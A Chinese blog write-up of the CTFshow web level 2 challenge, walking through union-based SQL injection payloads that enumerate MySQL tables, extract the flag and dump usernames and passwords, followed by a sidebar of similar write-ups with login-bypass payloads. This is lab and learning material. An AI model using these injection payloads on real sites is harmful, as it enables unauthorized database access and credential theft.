CTFSHOW web关卡第二关

于 2024-05-06 23:40:43 发布
阅读量337 收藏 4
点赞数 4
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46915877/article/details/138511053
版权

最近在做ctf练习(笔者太菜了,需要加强学习!)

今天是web的第二关,一个sql的联合注入题

尝试字符注入

登录成功

注意欢迎你,ctfshow,这里存在回显。我们尝试看看。

采用联合注入,发现注入点在第二个。注入出数据库名称为 web2

好,接下来我们需要去了解下information_schema这个数据库。

这个库下有很多表格。

1.columns表有 库、表、列名字

2.在tables表下存在库名、表名

现在我们要查找数据库下是否有flag的表名,通过

-1' union select 1, table_name,3 from information_schema.tables

查看目前库下所有表名

当然表有多,我们做一个限制

-1' union select 1, table_name,3 from information_schema.tables where table_schema="web2"#

在web2下一共两个表,flag就是我们要找的。当然,也会出现只回显一个值的情况,这时我们就用id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema="web2"),3#

group_concat ()函数是mysql提供的一个用于在查询时分组进行进行不同的字段拼接的方法,用它把所有表名拼接到一起带出

接下来我们来看看flag的列名

-1' union select 1, column_name,3 from information_schema.columns where table_schema="web2" and table_name="flag"#

当然也可以用

id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users"),3#

得到列名flag,接下来我们就要拿取flag表下的flag列的值

-1' union select 1,(select group_concat(flag) from flag),3#

-1' union select 1,flag,3 from flag#

flag就拿到了,当然我们还可以去看口令为多少

轮流注入,或者一起带出

-1' union select 1,(select group_concat(username,0x3a,password) from user),3#

0x3a为16进制的分隔符

兔白(Too Bad)
关注
  • 4
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
CTFshow_web2
zoixsoadji的博客
02-28 2222
进入题目,发现题目很简单,首先试试万能密码登陆。 登陆成功,接下来使用bp抓包,并且寻找注入点。 找到注入点,接下来看看它的2下面有什么 查到表名为web2的数据库,接下来继续注入,查询字段。 查找到了flag和user两个数据表,接下来查询字段 最后查询字段内容,得到flag 本人萌新,大佬手下留情 >_< ...
成语关卡数据6320,直接可以用
04-23
成语关卡不再需要一个个手动匹配了,六千数据,拿来可用
ctfshow-WEB-web2
热门推荐
wangyuxiang946的博客
08-19 1万+
ctf.show WEB模块第2是一个SQL注入漏洞,请求方式是POST请求,注入点是单引号字符型注入,flag就藏在当前的数据库的flag表中,使用联合注入获取数据即可 在用户名的输入框中输入万能账号a' or true #,密码随便输 登录成功,万能账号生效了,并且把查询到的用户名显示到了页面中,既然有显示位,那我们就用联合注入进行脱库 首先,测试一下回显的位置,在用户名的输入框中输入一下payload,密码还是随便输 a' union select 1,2...
2024年ctfshow-WEB-web2_ctf
最新发布
2401_84252281的博客
05-01 221
首先,测试一下回显的位置,在用户名的输入框中输入一下payload,密码还是随便输接下来,我们修改payload中2的位置,就可以将数据回显到页面中了,下面获取当前使用的数据库,盲猜flag就藏在当前使用的数据库中数据库有了,接下来是脱表,在用户名的输入框中输入一下payload,密码还是随便输接下来获取flag表的字段接下来获取flag表的数据。
CTFshow-web-web2
qq_68581192的博客
10-07 174
获取flag表的字段,输入1’ union select 1, (select group_concat(column_name) from information_schema.columns where table_schema=‘web2’ and table_name=‘flag’) ,3 # 显示如下 发现只有一个字段。获取flag表的数据,1’ union select 1,(select flag from flag),3 # 显示如下。
CTFshow:WEB2
精神大火的博客
03-21 1509
该题考察SQL注入漏洞,之前对SQL注入仅有部分了解,通过该题进行复习深入。
ctfshow-web2
HAI_WD的博客
07-24 308
知道这里是sql注入,确认一下是什么类型的闭合。可以知道闭合是单引号闭合,然后查一下显示的位数。这道题很多wp,但是为了完整性还是写一下。然后知道库了之后,锁定一下数据表。
C++自写《羊了个羊》 - 第二
10-14
在《羊了个羊》的第二实现中,C++的类和对象机制被用来构建游戏逻辑,包括玩家交互、游戏规则、关卡设计等。类的封装和继承特性使得代码结构清晰,易于维护。 游戏的核心在于算法,这里的C++代码可能包含了各种...
leveled:基于Web技术的关卡编辑器
05-12
"leveled:基于Web技术的关卡编辑器"是一个用于创建游戏关卡的工具,它充分利用了Web技术的力量,特别是JavaScript编程语言。这个项目可能是为了帮助游戏开发者或设计师在浏览器环境中构建、测试和编辑游戏场景,而...
c/c++ easyx 羊了个羊带第二源码
12-19
“羊了个羊”包含第二,这意味着游戏设计了多关卡的概念。每的布局和难度可以通过随机算法或者预设的关卡数据来实现。随着关卡的推进,元素数量、排列方式以及消除条件可能会逐渐复杂,增加游戏挑战性。 6. ...
CTF秀web2
天天学安全专属博客
11-20 985
CTF秀web2,union注入详解
CTFshow Web2
Lig_HossssT的博客
10-09 428
’ or 1=1 union select 1,database(),3# 查阅数据库得到数据库’web2’ ’ or 1=1 union select 1,table_name,3 from information_schema.tables where table_schema=‘web2’#查数据表 ’ or 1=1 union select 1,column_name,3 from information_schema.columns where table_name=‘flag’#查字...
ctfshow web2
weixin_51866363的博客
11-20 2826
ctfshow web2 writeup 这是本人第一次写blog,有不好的地方希望大家多多指出 从此开始踏上了网安的不归路,成为了一只web狗 从题目可以看出这是一道sql注入的题 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 首先我们尝试使用万能密码 admin 'or 1=1# **这里可以发现我们已经登陆成功了 接下来我们使用联合查询来查询回显位置** 1’ or 1=1 union select 1,2,3 # 爆表 1’ or 1=1 un
ctf show web2
yystarry的博客
12-29 209
我们点击View Hint得到“通过在url头部添加view-source:” 我们可以知道,url指的是一种资源定位符号,我们看这个要我们加入的字符,他的结尾有“:”,因此我们可以知道这串字符应该在头部加入 这样我们就得到了flag{cb46cd86-8f4a-4708-bb1d-55f2d8cbea1c} ...
CTFShow Web2
qq_62566956的博客
03-27 99
再按下F12就能正常查看源代码了。
CTFshow WEB web2
Y1da的博客
04-19 781
CTFshow WEB web2 直接登录发现URL无变化,网页使用POST传递参数,使用Burp抓包 POST / HTTP/1.1 Host: d19be25d-ff35-4fa2-b9c2-957c36215fe4.challenge.ctf.show Content-Length: 21 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://d19be25d-ff35-4fa2-b9c2-957c36215fe
ctfshow web7
08-23
ctfshow web7是一个CTF比赛中的一个关卡,它是一个SQL注入漏洞。在这个关卡中,注入点是一个数值型注入。源码对空格进行了过滤,但我们可以使用括号()或者注释/**/来代替空格。通过利用这个漏洞,我们可以执行恶意的SQL语句来获取敏感信息或者绕过身份验证。具体的解题思路和绕过方式可以参考引用中提供的详细教程和引用中的内容。最终,通过将flag提交到输入框中,我们可以过并获取相应的奖励。引用中提供的flag是过时所需的正确标志。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [CTFShow web1-7——CTF秀WEB模块解题思路](https://blog.csdn.net/wangyuxiang946/article/details/120297082)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* *3* [ctfshow-WEB-web7](https://blog.csdn.net/wangyuxiang946/article/details/119850344)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值